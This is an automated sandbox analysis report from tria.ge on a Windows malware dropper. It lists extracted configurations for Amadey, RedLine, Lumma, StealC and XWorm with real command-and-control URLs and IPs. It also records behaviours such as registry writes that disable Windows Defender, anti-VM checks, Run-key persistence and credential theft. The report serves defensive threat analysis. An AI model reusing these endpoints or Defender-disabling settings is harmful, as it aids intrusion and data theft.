Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
09/03/2025, 02:41
Static task
static1
Behavioral task
behavioral1
Sample
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Resource
win10v2004-20250217-en
General
-
Target
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
-
Size
1.9MB
-
MD5
5b1dbccb1977e33fae7e0efa78e96b49
-
SHA1
fd97d5e5080b0130e21f998ed33b47997dd87d84
-
SHA256
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77
-
SHA512
62de874632c6900b307c1fe3b3bfc00de88a3b80311d0c2746a71f53899f20eb658a944fd4e29d80a1af8e25695e61d913f64fc3b035fb7d78c8e7be13ca13a8
-
SSDEEP
49152:GbH3jNl9hAMO18bTKiyyGqxcyO1iQwLoFha7:GbHB72buXmA0iVLoFC
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
redline
Build 7
101.99.92.190:40919
Extracted
lumma
https://fostinjec.today/api
https://begindecafer.world/api
https://garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://5orangemyther.live/api
https://sfostinjec.today/api
https://rsterpickced.digital/api
https://defaulemot.run/api
https://.garagedrootz.top/api
https://orangemyther.live/api
https://sterpickced.digital/api
https://j8arisechairedd.shop/api
https://gmodelshiverd.icu/api
https://biochextryhub.bet/api
https://q8explorebieology.run/api
https://gadgethgfub.icu/api
https://moderzysics.top/api
https://5ktechmindzs.live/api
https://6codxefusion.top/api
https://7phygcsforum.life/api
https://techspherxe.top/api
https://earthsymphzony.today/api
https://garisechairedd.shop/api
https://0modelshiverd.icu/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
xworm
-
Install_directory
%AppData%
-
install_file
XClient.exe
-
pastebin_url
https://pastebin.com/raw/H3wFXmEi
Extracted
lumma
https://moderzysics.top/api
Signatures
-
Amadey family
-
Asyncrat family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000f000000023ba2-1756.dat family_xworm behavioral2/memory/5784-1769-0x00000000008E0000-0x0000000000914000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/4032-1751-0x00000000007C0000-0x0000000000C32000-memory.dmp healer behavioral2/memory/4032-1750-0x00000000007C0000-0x0000000000C32000-memory.dmp healer behavioral2/memory/4032-1798-0x00000000007C0000-0x0000000000C32000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" c04f336cff.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" c04f336cff.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" c04f336cff.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection c04f336cff.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" c04f336cff.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" c04f336cff.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" c04f336cff.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" c04f336cff.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications c04f336cff.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" c04f336cff.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/2892-45-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 1 IoCs
resource yara_rule behavioral2/memory/2892-45-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/7384-5338-0x0000000001100000-0x0000000001404000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 4496 created 3440 4496 Occupation.com 56 PID 4496 created 3440 4496 Occupation.com 56 PID 5664 created 3440 5664 Seat.com 56 PID 5664 created 3440 5664 Seat.com 56 -
resource yara_rule behavioral2/memory/7384-5338-0x0000000001100000-0x0000000001404000-memory.dmp VenomRAT -
Venomrat family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ yUI6F6C.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ SKO53PK432SKFGU9P1PE0JNLPLN.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c04f336cff.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ CgmaT61.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8a1e512b60.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 852937cf9d.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 41 4660 powershell.exe 48 4660 powershell.exe 227 5840 powershell.exe 229 5840 powershell.exe 230 5840 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3780 powershell.exe 8772 powershell.exe 7804 powershell.exe 1164 powershell.exe 5840 powershell.exe 2628 powershell.exe 4660 powershell.exe -
Downloads MZ/PE file 17 IoCs
flow pid Process 27 4236 rapes.exe 27 4236 rapes.exe 27 4236 rapes.exe 27 4236 rapes.exe 565 4236 rapes.exe 75 4488 XxzH301.exe 109 5428 8a1e512b60.exe 739 7504 mIrI3a9.exe 780 4236 rapes.exe 49 4236 rapes.exe 49 4236 rapes.exe 49 4236 rapes.exe 49 4236 rapes.exe 277 4236 rapes.exe 277 4236 rapes.exe 692 4236 rapes.exe 692 4236 rapes.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x000c000000024719-7484.dat net_reactor behavioral2/memory/9472-7493-0x0000000000BF0000-0x0000000000C50000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8a1e512b60.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8a1e512b60.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SKO53PK432SKFGU9P1PE0JNLPLN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 852937cf9d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 852937cf9d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c04f336cff.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c04f336cff.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion yUI6F6C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SKO53PK432SKFGU9P1PE0JNLPLN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion yUI6F6C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CgmaT61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CgmaT61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation ADFoyxP.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation mIrI3a9.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation ReK7Ewx.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation PfOHmro.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation ReK7Ewx.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation PfOHmro.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation zY9sqWs.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url cmd.exe -
Executes dropped EXE 44 IoCs
pid Process 4236 rapes.exe 664 PfOHmro.exe 2892 PfOHmro.exe 4556 ReK7Ewx.exe 4496 Occupation.com 4488 XxzH301.exe 512 m4mrV1B.exe 2736 OSKDbmy.exe 2064 rapes.exe 4012 RegAsm.exe 5348 micC4D2.tmp.exe 2384 RegAsm.exe 5428 8a1e512b60.exe 5696 SKO53PK432SKFGU9P1PE0JNLPLN.exe 5916 852937cf9d.exe 4964 2d911a7926.exe 4032 c04f336cff.exe 5784 HHPgDSI.exe 1724 HHPgDSI.exe 640 m4mrV1B.exe 3600 ReK7Ewx.exe 5184 rapes.exe 3776 javaw.exe 5108 Occupation.com 4604 yUI6F6C.exe 4148 ADFoyxP.exe 5664 Seat.com 6680 CgmaT61.exe 6152 PfOHmro.exe 6308 PfOHmro.exe 2376 v6Oqdnc.exe 7504 mIrI3a9.exe 7140 XxzH301.exe 7380 V0Bt74c.exe 6360 V0Bt74c.exe 6156 V0Bt74c.exe 6176 V0Bt74c.exe 7384 RegAsm.exe 7992 zY9sqWs.exe 8104 Gxtuum.exe 7832 a.exe 9472 mAtJWNv.exe 9524 mAtJWNv.exe 9912 rapes.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 852937cf9d.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 8a1e512b60.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine SKO53PK432SKFGU9P1PE0JNLPLN.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine c04f336cff.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine yUI6F6C.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine CgmaT61.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine v6Oqdnc.exe -
Loads dropped DLL 12 IoCs
pid Process 3776 javaw.exe 3776 javaw.exe 3776 javaw.exe 3776 javaw.exe 3776 javaw.exe 3776 javaw.exe 3776 javaw.exe 3776 javaw.exe 3776 javaw.exe 3776 javaw.exe 3776 javaw.exe 3776 javaw.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features c04f336cff.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" c04f336cff.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" m4mrV1B.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" m4mrV1B.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8a1e512b60.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148390101\\8a1e512b60.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\852937cf9d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148400101\\852937cf9d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2d911a7926.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148410101\\2d911a7926.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c04f336cff.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148420101\\c04f336cff.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 60 bitbucket.org 61 bitbucket.org 226 bitbucket.org 227 bitbucket.org 784 bitbucket.org 785 bitbucket.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 222 ip-api.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000d000000023b32-1353.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
pid Process 4048 tasklist.exe 1772 tasklist.exe 2836 tasklist.exe 804 tasklist.exe 4408 tasklist.exe 3132 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 3172 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 4236 rapes.exe 2064 rapes.exe 5428 8a1e512b60.exe 5696 SKO53PK432SKFGU9P1PE0JNLPLN.exe 5916 852937cf9d.exe 4032 c04f336cff.exe 5184 rapes.exe 4604 yUI6F6C.exe 6680 CgmaT61.exe 2376 v6Oqdnc.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 664 set thread context of 2892 664 PfOHmro.exe 95 PID 4660 set thread context of 616 4660 powershell.exe 138 PID 5840 set thread context of 3420 5840 powershell.exe 193 PID 6152 set thread context of 6308 6152 PfOHmro.exe 233 PID 7380 set thread context of 6156 7380 V0Bt74c.exe 246 PID 9472 set thread context of 9524 9472 mAtJWNv.exe 257 -
Drops file in Windows directory 17 IoCs
description ioc Process File opened for modification C:\Windows\PlatesRegister ReK7Ewx.exe File opened for modification C:\Windows\CombatTongue ReK7Ewx.exe File opened for modification C:\Windows\PracticeRoot ReK7Ewx.exe File opened for modification C:\Windows\FilenameWho ADFoyxP.exe File created C:\Windows\Tasks\rapes.job c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe File opened for modification C:\Windows\PlatesRegister ReK7Ewx.exe File opened for modification C:\Windows\CombatTongue ReK7Ewx.exe File opened for modification C:\Windows\PerfectlyFda ADFoyxP.exe File opened for modification C:\Windows\AccreditationShed ADFoyxP.exe File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe File opened for modification C:\Windows\GovernmentsHighly ADFoyxP.exe File opened for modification C:\Windows\PracticalPrevent ADFoyxP.exe File opened for modification C:\Windows\UpdatedMakeup ADFoyxP.exe File opened for modification C:\Windows\main.exe PfOHmro.exe File opened for modification C:\Windows\HighKerry ADFoyxP.exe File opened for modification C:\Windows\PracticeRoot ReK7Ewx.exe File created C:\Windows\main.exe PfOHmro.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 4964 664 WerFault.exe 94 6360 6152 WerFault.exe 232 7468 7380 WerFault.exe 243 9308 7384 WerFault.exe 238 9596 9472 WerFault.exe 256 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PfOHmro.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Occupation.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 852937cf9d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yUI6F6C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Seat.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CgmaT61.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 2d911a7926.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SKO53PK432SKFGU9P1PE0JNLPLN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language V0Bt74c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2d911a7926.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mIrI3a9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c04f336cff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ADFoyxP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PfOHmro.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8a1e512b60.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ReK7Ewx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language micC4D2.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PfOHmro.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ReK7Ewx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision javaw.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 javaw.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 2488 taskkill.exe 2808 taskkill.exe 872 taskkill.exe 2316 taskkill.exe 4592 taskkill.exe -
